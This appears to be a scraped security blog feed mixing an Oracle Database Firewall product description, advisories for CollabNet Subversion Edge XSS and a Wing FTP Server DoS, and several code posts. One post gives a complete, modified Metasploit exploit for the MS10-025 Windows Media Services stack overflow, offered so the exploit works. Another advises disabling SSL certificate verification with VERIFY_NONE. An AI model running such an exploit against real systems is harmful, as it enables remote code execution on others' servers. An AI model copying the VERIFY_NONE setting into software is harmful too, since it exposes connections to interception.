Oracle Database Firewall: <p>· Monitors and blocks SQL traffic on the network with white list, black list and exception list policies <p>· Protects against application bypass, SQL injection and similar threats <p>· Reports on database activity for SOX, PCI and other regulations, choosing from over 100 out-of-the-box reports <p>· Protects Oracle, SQL Server and Sybase databases <h4>White list, black list, exception list policies</h4> <p>Oracle Database Firewall examines the grammar of the SQL statements being sent to the database, analyzes their meaning, and determines the appropriate security policy to apply. This highly accurate approach provides a significantly higher degree of protection than first-generation database monitoring technologies that relied on recognizing the "signature" of known security threats. By enforcing normal application behavior, Oracle Database Firewall helps organizations avoid the costly and disruptive false positives and false negatives common with other approaches. Oracle Database Firewall recognizes SQL injection attacks on compromised applications and blocks them before they reach the database. <p><b><font size="3">3-click security policies</font></b> <p>Oracle Database Firewall supports white list, black list, and exception list policies. White list policies are simply the set of approved SQL commands that the firewall expects to see. These can be learned over time or imported from another Oracle Database Firewall. Black list policies are SQL commands that are not permitted to be sent to the database. Exception list policies provide additional deployment flexibility that can be used for one-off reporting or other special requirements. Policies can be enforced based on attributes including SQL category, time of day, applications, user, and IP addresses. 
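The white-list model described above rests on reducing each SQL statement to a "shape" so that a learned policy stays small and a parameterised variant of a known query is still recognised. The Ruby below is an added illustration of that idea, not Oracle's code or its grammar engine: literals are replaced by placeholders, the white list is learned from approved statements, a black list and a default action (block, log or substitute) complete the policy, and the sample statements are constructed. A real product parses the SQL grammar; the regex normaliser here is a deliberate simplification.

```ruby
# Reduce a SQL statement to its "shape": string and numeric literals become '?',
# whitespace and operator spacing are normalised and case is folded, so every
# parameterised variant of one application query maps to one white-list entry.
def sql_shape(sql)
  shape = sql.strip
  shape = shape.gsub(/'(?:[^']|'')*'/, '?')      # quoted string literals ('' escapes inside)
  shape = shape.gsub(/\b\d+(?:\.\d+)?\b/, '?')   # numeric literals (digits inside identifiers stay)
  shape = shape.gsub(/\s*([=<>,()])\s*/, ' \1 ')  # "id=1" and "id = 1" must look alike
  shape.gsub(/\s+/, ' ').strip.upcase
end

# A minimal positive/negative security model in the spirit of the white-list,
# black-list and default-action policy described above (constructed example).
class SqlPolicy
  # What the firewall forwards instead of an unknown statement in :substitute mode.
  SUBSTITUTE_SQL = "SELECT 'no records found' AS message WHERE 1 = 0".freeze

  # default: action for a statement shape that is on neither list (:block, :log, :substitute)
  def initialize(default: :block)
    @allowed = {}      # shape => true   (white list, learned from normal traffic)
    @denied  = {}      # shape => action (black list)
    @default = default
  end

  # Learning mode: record the shape of a statement observed from the approved application.
  def learn(sql)
    @allowed[sql_shape(sql)] = true
    self
  end

  # Black-list a statement shape with an explicit action.
  def deny(sql, action: :block)
    @denied[sql_shape(sql)] = action
    self
  end

  # Decide what to forward for an incoming statement.
  # Returns [action, sql_to_forward]; :block forwards nothing (nil).
  def decide(sql)
    shape = sql_shape(sql)
    action = if @denied.key?(shape) then @denied[shape]
             elsif @allowed.key?(shape) then :allow
             else @default
             end
    forwarded = case action
                when :allow, :log then sql
                when :substitute  then SUBSTITUTE_SQL
                end
    [action, forwarded]
  end
end

# Learn the application's two queries, black-list one command, then evaluate traffic.
def firewall_demo(default: :block)
  policy = SqlPolicy.new(default: default)
  policy.learn("SELECT name, balance FROM accounts WHERE id = 42")
        .learn("UPDATE accounts SET balance = 100.50 WHERE id = 42")
        .deny("DROP TABLE accounts", action: :block)
  {
    same_shape:  policy.decide("select name, balance from accounts where id=7").first,
    tautology:   policy.decide("SELECT name, balance FROM accounts WHERE id = '' OR '1'='1'").first,
    stacked:     policy.decide("SELECT name, balance FROM accounts WHERE id = 7; DROP TABLE accounts").first,
    blacklisted: policy.decide("drop table accounts").first,
    unknown_fwd: policy.decide("SELECT * FROM accounts").last
  }
end

if __FILE__ == $0
  firewall_demo.each { |label, result| puts "#{label}: #{result.inspect}" }
  puts "unknown with :substitute -> #{firewall_demo(default: :substitute)[:unknown_fwd]}"
end
```

Two design points carry over to the real thing: the black list is consulted before the white list, so an explicitly denied shape can never be re-learned by accident, and the default for an unknown shape is deny, which is what makes the model positive rather than signature-based.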
<p><a href="http://lh4.ggpht.com/_KqURyIY5WSM/TQIcXNpBnYI/AAAAAAAACYU/zc_2NVcahDs/s1600-h/clip_image004%5B3%5D.gif"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image004" border="0" alt="clip_image004" src="http://lh3.ggpht.com/_KqURyIY5WSM/TQIcYKoYV_I/AAAAAAAACYY/fmPBhwFnGXU/clip_image004_thumb.gif?imgmax=800" width="240" height="91"></a> <p>Oracle Database Firewall can log the SQL command in question, block the SQL command, or substitute the incoming bad SQL request with an alternative SQL statement that, for example, simply returns no data, or returns a predetermined error message such as "no records found". This flexibility, combined with advanced SQL grammar analysis, enables organizations to spend more time doing what needs to be done and less time handling false alarms. <p><b>Safe, Scalable Deployment Models</b> <p>Oracle Database Firewall works on the network, transparent to database servers and applications, and can be quickly deployed. Customers can choose from several deployment models to meet their business requirements: <p>· Inline blocking and monitoring mode <p>· Inline monitoring-only mode <p>· Out-of-band monitoring mode <p>Oracle Database Firewall provides a centralized management console for monitoring multiple databases simultaneously and supports parallel devices for high availability deployments. Optional host-based agents can provide low-impact local monitoring capabilities. 
<p><a href="http://lh5.ggpht.com/_KqURyIY5WSM/TQIcZBOetUI/AAAAAAAACYc/F1ZpA1zl2dM/s1600-h/clip_image005%5B3%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image005" border="0" alt="clip_image005" src="http://lh5.ggpht.com/_KqURyIY5WSM/TQIcZzoXI-I/AAAAAAAACYg/whDAiYOZYUE/clip_image005_thumb.jpg?imgmax=800" width="244" height="140"></a> <table border="0" cellspacing="5" cellpadding="0"> <tbody> <tr> <td valign="top"> </td></tr></tbody></table> <h4>Flexible reporting and alerting</h4> <p>Oracle Database Firewall includes over 125 prebuilt reports that can be easily customized for regulations such as PCI, HIPAA and SOX. Real-time alerts can also be set up for fast response to any policy exception. For privacy and compliance requirements, personally identifiable information contained in logged SQL can be masked. <p><a href="http://lh5.ggpht.com/_KqURyIY5WSM/TQIca17fEMI/AAAAAAAACYk/EfEQ-8am_ms/s1600-h/clip_image007%5B3%5D.gif"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image007" border="0" alt="clip_image007" src="http://lh3.ggpht.com/_KqURyIY5WSM/TQIcbvfa9FI/AAAAAAAACYo/d-magdSPieo/clip_image007_thumb.gif?imgmax=800" width="240" height="99"></a> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-17844648558000473482010-09-16T05:15:00.000-07:002010-09-16T05:24:41.546-07:00CollabNet Subversion Edge Log Parser XSS/Code Injection VulnerabilityDiscovery Date: Sep 10, 2010<br />Risk: Important<br /><span style="font-weight:bold;">Description:</span><br /><br />There is a Cross Site Scripting (XSS) vulnerability in CollabNet Subversion Edge 1.2 and prior versions. 
The said vulnerability can be exploited by sending a crafted request to the CollabNet Subversion server: the request is written to the log unescaped, and when an administrator views the log file through the log parser, the injected script is executed in the administrator's browser.<br /><br />More information on this can be found on the following page:<br />https://ctf.open.collab.net/sf/sfmain/do/go/artf5016?returnUrlKey=1284577592506<br /><br /><b>Patch Information:</b><br /><br />More information on the patch can be found on the following page:<br />https://ctf.open.collab.net/sf/wiki/do/viewPage/projects.svnedge/wiki/Release_1.2.1<br /><br /><i>Discovered by: Sumit Kumar Soni, Trend Micro</i><div><i>Email: ssummit@gmail.com</i></div>Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-63202793834345459612010-06-20T23:42:00.000-07:002010-06-20T23:45:12.835-07:00Wing FTP Server PORT Command DoS VulnerabilityDiscovery Date: Nov 14, 2009<br />Risk: Important<br />Affected Software:<br /><br /> * Wing FTP Server 3.1.2<br /><br />Description:<br /><br />There is a Denial of Service (DoS) vulnerability in Wing FTP Server 3.1.2. The said vulnerability can be exploited by using an invalid parameter for the PORT command. When exploited successfully, the vulnerability could cause an FTP server running the said software to crash.<br /><br />Wing FTP Server 3.1.2 on a Windows environment is affected. 
Other versions may also be affected.<br /><br />Patch Information:<br /><br />More information on the patch can be found on the following page:<br /><br /> * Wing FTP Server History<br /><br />Discovered by: Sumit Kumar Soni, Trend Micro<br />Email: ssummit @ gmail.com<br />Read more about this threat incident in the Malware Blog entry "Trend Micro Discovers Wing FTP Server PORT Command DoS Bug."Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-11730680107588836792010-04-29T05:34:00.000-07:002010-04-29T05:38:52.748-07:00Solution to avoid SSL Cert Verification in Ruby Soap4rJust add
<br /><p class="MsoNormal">@verify_mode = SSL::VERIFY_NONE
<br /></p><p class="MsoNormal">in C:\ruby\lib\ruby\gems\1.8\gems\httpclient-2.1.5.2\lib\httpclient\ssl_config.rb</p><p class="MsoNormal">
<br /></p><p class="MsoNormal">if you want to avoid following error.
<br /></p>
<br />at depth 0 - 18: self signed certificate
<br />c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:247:in `connect': certificate verify failed (OpenSSL::SSL::SSLError)
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:247:in `ssl_connect'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:639:in `connect'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/timeout.rb:128:in `timeout'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:631:in `connect'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:522:in `query'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:147:in `query'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient.rb:953:in `do_get_block'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient.rb:765:in `do_request'
<br /> ... 7 levels...
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/proxy.rb:143:in `call'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/driver.rb:181:in `call'
<br />
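<p>Added example, not part of the original post: VERIFY_NONE silences error 18 by skipping certificate validation for every connection, whereas the alternative below keeps VERIFY_PEER and instead adds the server's self-signed certificate to the trust store. It uses only Ruby's stdlib openssl and Net::HTTP so it runs offline; the certificate and the hostname internal.example.test are constructed here, and the httpclient counterpart is assumed to be loading the same certificate through its ssl_config trust list (add_trust_ca) rather than changing @verify_mode.</p>

```ruby
require 'openssl'
require 'net/http'

# Constructed for this example: a self-signed certificate standing in for the
# internal server whose certificate produced "self signed certificate" above.
def make_self_signed_cert(cn = 'internal.example.test')
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.issuer     = cert.subject            # self-signed: issuer == subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate  = cert
  cert.add_extension(ef.create_extension('basicConstraints', 'CA:TRUE', true))
  cert.add_extension(ef.create_extension('keyUsage', 'keyCertSign, digitalSignature', true))
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  [cert, key]
end

# Verify a certificate against an explicit set of trust anchors, which is what
# the TLS layer does under VERIFY_PEER. Returns [ok, openssl_error_code]; an
# empty anchor list reproduces error 18 (depth-zero self-signed certificate).
def verify_against(cert, trust_anchors)
  store = OpenSSL::X509::Store.new
  trust_anchors.each { |anchor| store.add_cert(anchor) }
  ok = store.verify(cert)
  [ok, ok ? 0 : store.error]
end

# Build a Net::HTTP client that keeps VERIFY_PEER and trusts only the given
# anchors (hypothetical helper; the stdlib counterpart of httpclient's trust list).
def pinned_client(host, trust_anchors)
  store = OpenSSL::X509::Store.new
  trust_anchors.each { |anchor| store.add_cert(anchor) }
  http = Net::HTTP.new(host, 443)
  http.use_ssl     = true
  http.verify_mode = OpenSSL::SSL::VERIFY_PEER
  http.cert_store  = store
  http
end

if __FILE__ == $0
  cert, _key = make_self_signed_cert
  ok, err = verify_against(cert, [])
  puts "empty trust store:     ok=#{ok} error=#{err}"
  ok, err = verify_against(cert, [cert])
  puts "cert added as anchor:  ok=#{ok} error=#{err}"
end
```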
<p>Sumit Soni, http://www.blogger.com/profile/00997252131888697683</p>

<p><strong>Rename Multiple Files</strong> (2010-04-25T03:17:00.000-07:00)</p>
<span style="font-weight: bold;">Usage: rename perlexpr direpath</span>
<pre>
#!/usr/bin/perl
use strict;
use warnings;

# Usage: rename perlexpr direpath
if ($#ARGV != 1) {
    print "Usage: rename perlexpr direpath\n";
    print "ex. rename s/exe/html c:/test\n";
    exit(0);
}
my $regexp = shift;
my $dir    = shift;
opendir(my $dh, $dir) or die "Cannot open directory $dir: $!\n";
my @files = readdir($dh);
closedir($dh);
foreach (@files) {
    my $file = $_;
    next if $file eq '.' or $file eq '..';   # never touch the directory entries themselves
    print "file-->$file\n";
    eval $regexp;                            # apply the user-supplied s/// expression to $_
    die $@ if $@;
    my $path = "$dir/$file";
    print "$path\n";
    rename($path, "$dir/$_") or warn "rename failed for $path: $!\n" unless $file eq $_;
}
</pre>
<p>Sumit Soni, http://www.blogger.com/profile/00997252131888697683</p>

<p><strong>What's wrong with MSF ms10_025_wmss_connect_funnel Sploit</strong> (2010-04-23T03:06:00.000-07:00)</p>
<p>Looks like the Metasploit team added this exploit to the framework in a hurry. They are sending the Current info & Transport info messages in a single packet, which will never exploit the vulnerability (correct me if I'm wrong).</p>
<p>Here is the modified code that should work.</p>
<pre>
##
# $Id: ms10_025_wmss_connect_funnel.rb 9101 2010-04-17 11:22:37Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Windows Media
        Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially
        crafted FunnelConnect request, an attacker can execute arbitrary code
        under the "NetShowServices" user account. Windows Media Services 4.1 ships
        with Windows 2000 Server, but is not installed by default.

        NOTE: This service does NOT restart automatically. Successful, as well as
        unsuccessful exploitation attempts will kill the service which prevents
        additional attempts.
      },
      'Author'         => 'jduck',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9101 $',
      'References'     =>
        [
          [ 'CVE', '2010-0478' ],
          [ 'OSVDB', '63726' ],
          [ 'MSB', 'MS10-025' ],
          [ 'URL', 'https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro SP4 English',
            {
              # SEH handler offset is 840
              # Stack return is at 652
              'Offset' => 840,
              'Ret'    => 0x75022ac4 # p/p/r in ws2help.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 13 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(1755)
      ], self.class)
  end

  def exploit
    @pkts = 0
    cmd_buf = ''

    # LinkViewerToMacConnect
    subscriber = "NSPlayer/4.1.0.3928; {68c0a090-8797-11d2-a2b3-00a0c9b60551}"
    #subscriber = "NSPlayer/7.0.0.1956; {}; Host: The.Host.Net"
    #subscriber = "Spooooon!"
    subscriber << "\x00"
    subscriber = Rex::Text.to_unicode(subscriber)
    cmd_buf << make_command(0x30001, subscriber)

    # LinkViewerToMacConnectFunnel
    #name = Rex::Text.pattern_create(512)
    name = ''
    name << "\\\\"
    name << rand_text((target['Offset'] + 4 + 5) / 2)
    name << "\\"
    name << "\x00"

    # Convert it to Unicode..
    name = Rex::Text.to_unicode(name)

    # Insert the return address..
    name[4,payload.encoded.length] = payload.encoded

    # Build the SEH frame that leads to the payload...
    seh = generate_seh_record(target.ret)
    asm = "add edi, 0x04\njmp edi"
    seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
    name[target['Offset'],seh.length] = seh

    <span style="color: rgb(204, 0, 0);">##sumit start
    pkt = make_tcpmsghdr(cmd_buf)
    connect
    sock.put(pkt)
    ##sumit done
    cmd_buf = ''</span>

    # Add it to the command buffer..
    cmd_buf << make_command(0x30002, name)

    # Build the TcpMessageHeader ..
    pkt = make_tcpmsghdr(cmd_buf)

    print_status("Sending crafy commands (#{pkt.length} bytes) ...")
    # Handle the transacation..
    #connect
    sock.put(pkt)

    handler
    disconnect
  end


  #
  # Create a TcpMessageHeader from the supplied data
  #
  def make_tcpmsghdr(data)
    len = data.length
    # The server doesn't like packets that are bigger...
    raise RuntimeError, 'Length too big' if (len > 0x1000)
    len /= 8

    # Pack the pieces in ...
    pkt = [
      1,0,0,0,          # rep, ver, verMinor, pad
      0xb00bface,       # session id (nice)
      data.length + 16, # msg len
      0x20534d4d,       # seal ("MMS ")
      len + 2,          # chunkCount
      @pkts, 0,         # seq, MBZ
      rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e
    ].pack('CCCCVVVVvvVV')

    # Add the data
    pkt << data

    # Pad it to 8 bytes...
    left = data.length % 8
    pkt << ("\x00" * (8 - left)) if (left > 0)

    pkt
  end


  #
  # Create a command packet
  #
  def make_command(msg_id, extra)
    # Two opcodes, get handled differently..
    case msg_id
    when 0x30001
      data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV')

    when 0x30002
      data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV')

    end

    # Put some data on...
    data << extra

    # Pad it to 8 bytes...
    left = data.length % 8
    data << ("\x00" * (8 - left)) if (left > 0)

    # Combine the pieces..
    pkt = [
      (data.length / 8) + 1, # chunkLen
      msg_id                 # msg ID
    ].pack('VV')
    pkt << data

    pkt
  end

end
</pre>
<p>Sumit Soni, http://www.blogger.com/profile/00997252131888697683</p>

<p><strong>What is not Correct with MSF</strong> (2010-03-27T03:50:00.000-07:00)</p>
<p>Looks like their spell check missed this typo (check the TCP::max_send_size description):</p>
<pre>
msf exploit(ms08_067_netapi) > show evasion

Module evasion options:

   Name           : DCERPC::fake_bind_multi
   Current Setting: true
   Description    : Use multi-context bind calls

   Name           : DCERPC::fake_bind_multi_append
   Current Setting: 0
   Description    : Set the number of UUIDs to append the target

   Name           : DCERPC::fake_bind_multi_prepend
   Current Setting: 0
   Description    : Set the number of UUIDs to prepend before the target

   Name           : DCERPC::max_frag_size
   Current Setting: 4096
   Description    : Set the DCERPC packet fragmentation size

   Name           : DCERPC::smb_pipeio
   Current Setting: rw
   Description    : Use a different delivery method for accessing named pipes
                    (accepted: rw, trans)

   Name           : SMB::obscure_trans_pipe_level
   Current Setting: 0
   Description    : Obscure PIPE string in TransNamedPipe (level 0-3)

   Name           : SMB::pad_data_level
   Current Setting: 0
   Description    : Place extra padding between headers and data (level 0-3)

   Name           : SMB::pad_file_level
   Current Setting: 0
   Description    : Obscure path names used in open/create (level 0-3)

   Name           : SMB::pipe_evasion
   Current Setting: False
   Description    : Enable segmented read/writes for SMB Pipes

   Name           : SMB::pipe_read_max_size
   Current Setting: 1024
   Description    : Maximum buffer size for pipe reads

   Name           : SMB::pipe_read_min_size
   Current Setting: 1
   Description    : Minimum buffer size for pipe reads

   Name           : SMB::pipe_write_max_size
   Current Setting: 1024
   Description    : Maximum buffer size for pipe writes

   Name           : SMB::pipe_write_min_size
   Current Setting: 1
   Description    : Minimum buffer size for pipe writes

   Name           : TCP::max_send_size
   Current Setting: 0
   <span style="color: rgb(255, 0, 0);">Description    : Maxiumum tcp segment size. (0 = disable)</span>

   Name           : TCP::send_delay
   Current Setting: 0
   Description    : Delays inserted before every send. (0 = disable)
</pre>
<p>Sumit Soni, http://www.blogger.com/profile/00997252131888697683</p>

<p><strong>twitter got hacked in the morning</strong> (2009-12-18T01:19:00.000-08:00)</p>
<p>Visiting the site shows this message:</p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FSN2VODGAx3GxFlIDfHEorTZI3mB9mHobQkTvnt2MHqFpiWsK-MkqH30urNnkUhbjZFeWyozN9USEa6nqaUjSieJmvOGs9M6STPZFg8GewZklxdGzuGehJSlzz8p5d_bBPyl_SC3Kmw/s1600-h/000011.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FSN2VODGAx3GxFlIDfHEorTZI3mB9mHobQkTvnt2MHqFpiWsK-MkqH30urNnkUhbjZFeWyozN9USEa6nqaUjSieJmvOGs9M6STPZFg8GewZklxdGzuGehJSlzz8p5d_bBPyl_SC3Kmw/s320/000011.png" alt="" id="BLOGGER_PHOTO_ID_5416503673277316098" border="0" /></a>
<p>Sumit Soni, http://www.blogger.com/profile/00997252131888697683</p>